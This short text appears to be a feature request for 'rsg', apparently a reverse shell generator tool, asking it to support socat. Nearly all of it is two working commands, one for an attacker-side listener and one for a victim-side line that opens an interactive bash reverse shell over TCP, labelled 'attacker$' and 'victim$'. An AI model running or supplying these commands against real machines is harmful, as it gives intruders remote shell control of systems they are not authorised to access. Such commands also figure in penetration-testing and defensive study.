rsg
rsg copied to clipboard
Feature request - socat
Far best option is to use socat for listening and hosting side:
attacker$ socat file:`tty`,raw,echo=0 tcp-listen:8080,fork
victim$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:127.0.0.1:8080,forever &